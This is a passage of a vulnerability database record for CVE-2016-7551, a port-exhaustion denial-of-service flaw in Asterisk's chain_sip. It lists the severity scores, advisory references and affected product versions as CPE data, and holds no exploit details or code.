7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

chain_sip in Asterisk Open Source 11.x before 11.23.1 and 13.x 13.11.1 and Certified Asterisk 11.6 before 11.6-cert15 and 13.8 before 13.8-cert3 allows remote attackers to cause a denial of service (port exhaustion).

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2016-007.html	Mitigation, Vendor Advisory
cve@mitre.org	http://www.debian.org/security/2016/dsa-3700	Third Party Advisory
cve@mitre.org	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838832	Issue Tracking, Patch, Third Party Advisory
cve@mitre.org	https://bugzilla.redhat.com/show_bug.cgi?id=1374733	Issue Tracking, Patch
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-26272	Issue Tracking, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2016-007.html	Mitigation, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2016/dsa-3700	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=838832	Issue Tracking, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugzilla.redhat.com/show_bug.cgi?id=1374733	Issue Tracking, Patch
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-26272	Issue Tracking, Patch, Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.2.1
digium	asterisk	11.2.2
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
digium	asterisk	11.5.1
digium	asterisk	11.6.0
digium	asterisk	11.6.1
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.1
digium	asterisk	11.10.2
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	11.12.1
digium	asterisk	11.13.0
digium	asterisk	11.13.1
digium	asterisk	11.14.0
digium	asterisk	11.14.1
digium	asterisk	11.14.2
digium	asterisk	11.15.0
digium	asterisk	11.15.1
digium	asterisk	11.16.0
digium	asterisk	11.17.0
digium	asterisk	11.17.1
digium	asterisk	11.18.0
digium	asterisk	11.19.0
digium	asterisk	11.20.0
digium	asterisk	11.21.0
digium	asterisk	11.21.1
digium	asterisk	11.21.2
digium	asterisk	11.22.0
digium	asterisk	11.22.0
digium	asterisk	11.23.0
digium	asterisk	11.23.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.0.2
digium	asterisk	13.1.0
digium	asterisk	13.1.1
digium	asterisk	13.2.0
digium	asterisk	13.2.1
digium	asterisk	13.3.0
digium	asterisk	13.3.1
digium	asterisk	13.3.2
digium	asterisk	13.4.0
digium	asterisk	13.5.0
digium	asterisk	13.6.0
digium	asterisk	13.7.0
digium	asterisk	13.7.1
digium	asterisk	13.7.2
digium	asterisk	13.8.0
digium	asterisk	13.8.0
digium	asterisk	13.8.1
digium	asterisk	13.8.2
digium	asterisk	13.9.0
digium	asterisk	13.9.1
digium	asterisk	13.10.0
digium	asterisk	13.10.0
digium	asterisk	13.11.0
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8
digium	certified_asterisk	13.8.0
digium	certified_asterisk	13.8.0
debian	debian_linux	8.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CEEB6C2-0A6D-4434-8446-CB8605CD3B14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F31715AF-5A35-4D0B-8E01-BB6E4CB7E02F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7BE4127D-8123-4408-86D3-08168A4501B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8836F348-66DF-43BC-9962-946018D13127",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "12745DB9-F19D-4507-A9FE-218B7BB29DB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8788AF7B-CBB6-4D9D-A748-486787935A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B3D89C7-909F-419A-9EE8-A1F0D02934EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "24F62C78-2913-463F-B689-353AB2371E3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A70420A8-8571-4528-98E1-72BE00270C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0F79D5F-EB28-417A-86DF-053D6EDBA161",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C92ECBCD-1EE3-498A-B3A4-22BF8EFD2EE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "65607103-4284-430A-8212-AC1DCFFFA778",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4061B4C7-8315-450C-866A-C4F3A6BCB1A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "00099DC9-D437-429B-9D08-F0DFA4942A6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EC6047FB-D1BD-4E21-B6BC-E51374C4B0E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "89504BDC-82F7-4813-9C1E-456C9ACC6FB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "118C550E-79A8-431E-BADB-710EEEEDC6C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A62DFFE-637B-4911-B3B4-6DA4053CBDBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5DF6BC60-23F5-46A1-83F8-F4BCDEF196EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9F7C5D35-A6AE-4A2E-98C5-CB58FF22AF08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D23CE302-AC62-468C-96B3-1EF430825170",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "9DCAA174-3CA3-49DB-BA19-D2BCF4F8953F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "FD4D1A5A-99A3-4D23-B40C-BBE11EA5B325",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5EFFAE3F-3B78-49DE-8F01-2E439D9A6F7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.20.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0501E88B-986A-44C6-A6B5-F2CB9087A8B5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D3AF185-7AC6-491E-9BE0-8ECD163A3E77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "400EA2E1-B178-467F-BBC2-1B2ECEDE662A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E00A6C7-D3CF-40B5-A586-06E09C5AA1A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E25D043-EE0D-49A5-A468-03EDD9CFE0EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.22.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CA17630B-444D-4AE4-B582-F8106C4EEFDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "62A20D6B-62FE-440D-BC58-F764AAA5562B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.23.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F2AE880B-2FA2-42BB-BEBF-771E18FDA141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B635C21-C193-43AF-A139-98604F324ABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "E93A7967-9A04-424A-BDDB-A2B8289B9AC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "8F75C9FF-6F95-4F6A-B683-FE2BEDE3AD10",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "68226156-42ED-4F0E-93E1-02DD57E582B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A4EB385E-28B5-4259-9431-99E1F32D61B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "121EACD3-D5E3-4691-8024-95996865BB65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "74B23D17-7356-4D37-8C73-E87896D1335B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D5BA542E-4667-4D9E-BDAE-FED6CA63F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "83C8E7EC-0D4C-40E2-9EE1-4AB5F03464D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "81A8A6CB-D236-4AB3-8476-C2D34DB7EF31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "599833A2-CBE9-479B-8A6E-AF79C5EED1DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B870B3B7-E8DC-45A2-8FA4-657D005D00E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "707296C4-153C-4ACF-B91A-AB5FA42260CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "905722CB-4B6C-4849-88CD-22E972432E36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C1C39FA-EF1A-4F2B-87A0-A00BAE73C6A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "677D1211-0B07-47B9-AB7A-E820E2B29561",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "84202BAF-29E1-472B-B11F-B73F6A8891CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FFC7120D-E6A0-4801-A1CC-3E143896EE72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "BAF2A83D-D9AE-441D-8D4E-335BF9D28A63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F5C1479-A540-4B7D-B00C-BD35EEC83BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC12556C-5E82-47D7-87E5-FBDC01A920DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "461C1D2D-C4C1-4FF8-8231-38A2505F3523",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "66595711-8573-4A9B-A8FE-4943E3097AA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FE3D4-A0B9-475A-9B89-B0222283A6A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9670B5AC-CBD1-484C-90F8-69B1A60B6054",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:lts:*:*:*",
              "matchCriteriaId": "BB47EA31-CF9D-4752-804B-7804151EC87C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert11:*:*:lts:*:*:*",
              "matchCriteriaId": "A1C9B744-1745-4E9D-A2DE-4659295508D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert12:*:*:lts:*:*:*",
              "matchCriteriaId": "BFFD88AD-C82E-4C5C-9C4F-8A49176E3E52",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert13:*:*:lts:*:*:*",
              "matchCriteriaId": "6797C78B-BB9A-46B4-8F0B-492FB1988BB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14:*:*:lts:*:*:*",
              "matchCriteriaId": "10A38D53-6C8E-493E-8207-F4CF7D754A5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert15:*:*:lts:*:*:*",
              "matchCriteriaId": "4CC0C753-9179-4C71-AFD8-C4601D8C865A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "6DAF6784-0B31-4104-9D85-473D5AFAB785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "77B06B83-D62C-4A0E-BE94-83C9A02CE55A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:lts:*:*:*",
              "matchCriteriaId": "CAD17809-CBB1-4E41-99C9-20FE56853563",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:lts:*:*:*",
              "matchCriteriaId": "066453F2-A77F-4E82-8C91-AC17FAA21A89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "38E19C8E-9FD6-4A44-81C6-EEC91BC2CB58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2016E8F9-542D-46CE-905D-3CBAF97A24A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CC283754-B316-4BCE-8EEB-63CAFE68D601",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D111448-7C39-4A6D-B492-B3D3DCEA8424",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert2_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A52E12AB-99CA-4A34-A0CA-E8B511636A5E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB08CB2-8FB4-4738-9B67-C27273A78025",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1E36EFEF-670E-4659-A887-D497D4AA8223",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "chain_sip in Asterisk Open Source 11.x before 11.23.1 and 13.x 13.11.1 and Certified Asterisk 11.6 before 11.6-cert15 and 13.8 before 13.8-cert3 allows remote attackers to cause a denial of service (port exhaustion)."
    },
    {
      "lang": "es",
      "value": "chain_sip en Asterisk Open Source 11.x en versiones anteriores a 11.23.1 y 13.x 13.11.1 y Certified Asterisk 11.6 en versiones anteriores a 11.6-cert15 y 13.8 en versiones anteriores a 13.8-cert3 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (agotamiento portuario)"
    }
  ],
  "id": "CVE-2016-7551",
  "lastModified": "2024-11-21T02:58:11.967",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
